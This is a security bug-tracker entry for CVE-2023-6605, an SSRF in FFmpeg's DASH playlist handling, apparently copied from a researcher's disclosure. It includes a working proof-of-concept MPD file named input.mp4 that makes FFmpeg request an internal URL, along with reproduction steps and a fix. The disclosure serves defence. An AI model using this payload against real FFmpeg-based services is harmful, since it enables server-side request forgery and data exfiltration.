Bug 1220550 (CVE-2023-6605)

Summary: VUL-0: CVE-2023-6605: ffmpeg,ffmpeg-4: DASH Playlist SSRF
Product: [Novell Products] SUSE Security Incidents Reporter: SMASH SMASH <smash_bz>
Component: IncidentsAssignee: E-mail List <gnome-bugs>
Status: NEW --- QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: gnome-bugs, stoyan.manolov, thomas.leroy
Version: unspecifiedFlags: stoyan.manolov: needinfo? (gnome-bugs)
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/395220/
Whiteboard: CVSSv3.1:SUSE:CVE-2023-6605:7.2:(AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
Found By: Security Response Team Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description SMASH SMASH 2024-02-28 11:04:38 UTC 
FFmpeg Findings 2023.12.01
Overview
Included in this document are five (5) bugs in the open-source package ffmpeg. Internal CVSS 3.1 scoring for these bugs range from 3.9 to 7.2. Attribution for these findings: Harvey Phillips of Amazon Element55 (element55@amazon.com).

If the recipient of this notice (secalert@redhat.com) has any questions regarding these findings, please do not hesitate to contact us at element55@amazon.com.


V. DASH Playlist SSRF
Affected Versions: 4.2 → 6.0 (latest)

DASH playlist support requires FFmpeg to be compiled with libxml2 support.




Suggested CVSS 3.1: 7.2 AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Summary
An instance of FFmpeg that does not enforce an input format can be provided a malicious input that will trigger an SSRF to an attacker controlled URL.


Impact
Arbitrary HTTP GET requests can be made on behalf of the machine that FFmpeg is running on.


Description
The DASH demuxer doesn't check the protocol whitelist before triggering the http demuxer which updates the whitelist to include http,https,tls,rtp,tcp,udp,crypto,httpproxy,data.



[NULL @ 0xaaaaf874c1a0] Opening 'input.mp4' for reading
[file @ 0xaaaaf874ca90] Setting default whitelist 'file,crypto,data'
Probing dash score:100 size:526
[dash @ 0xaaaaf874c1a0] Format dash probed with size=2048 and score=100
[dash @ 0xaaaaf874c1a0] DASH request for url 'http://localhost:8000/secret', offset 0, playlist 0
[http @ 0xaaaaf8751370] Setting default whitelist 'http,https,tls,rtp,tcp,udp,crypto,httpproxy,data'


As the response to any HTTP requests made are treated as input to FFmpeg, a DASH playlist can be constructed so that the first request is to an attacker controlled web server that returns, e.g. an XBIN header. Once the XBIN demuxer is triggered, the subsequent requests (even to non-attacker controlled web servers) will be treated as XBIN input. This results in a partial rendering in the output artifact, allowing for possible data exfiltration.


Reproduction
Example Input (input.mp4):


<MPD xmlns="urn:mpeg:dash:schema:mpd:2011" profiles="urn:mpeg:dash:profile:full:2011,http://www.dashif.org/guidelines/low-latency-live-v5" type="none">
  <Period duration="PT1S">
    <BaseURL></BaseURL>
    <AdaptationSet contentType="video" lang="en">
      <Representation id="video">
        <SegmentList>
          <SegmentURL media="http://localhost:8000/secret"/>
        </SegmentList>
      </Representation>
    </AdaptationSet>
  </Period>
</MPD>


Spawn an HTTP locally server (e.g. python3 -m http.server) and run ffmpeg -i input.mp4 output.mp4 with the above input. You'll see a GET to /secret in the logs of the HTTP server.


Remediation
DASH playlists should restrict URIs to data:// and file:// unless otherwise specified with protocol_whitelist.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-6605
https://bugzilla.redhat.com/show_bug.cgi?id=2253172